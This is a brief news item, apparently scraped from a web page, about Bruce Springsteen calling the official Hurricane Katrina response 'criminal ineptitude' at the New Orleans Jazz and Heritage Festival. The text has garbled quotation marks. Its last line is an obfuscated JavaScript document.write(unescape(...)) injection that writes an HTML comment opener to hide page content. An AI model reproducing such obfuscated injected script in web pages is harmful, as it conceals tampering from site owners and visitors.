Legendary singer/songwriter Bruce Springsteen has blasted the inept response to Hurricane Katrina by American politicians.
Speaking after he'd performed at the Jazz and Heritage Festival in New Orleans Springsteen criticised politicians for their “criminal ineptitudeâ€.
Springsteen visited many of the worst affected areas after the hurricane and said of the situation: "I saw sights I never thought I'd see in an American city. The criminal ineptitude makes you furious."
According to the BBC Springsteen's set at the festival included the song ‘How Can A Poor Man Stand Such Times And Live?' which included lyrics about “bodies floating†and levees which had “gone to hellâ€.
He also dedicated the song ‘My City In Ruins' to New Orleans and was joined on the bill by Bob Dylan, Elvis Costello and The Dave Matthews Band.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
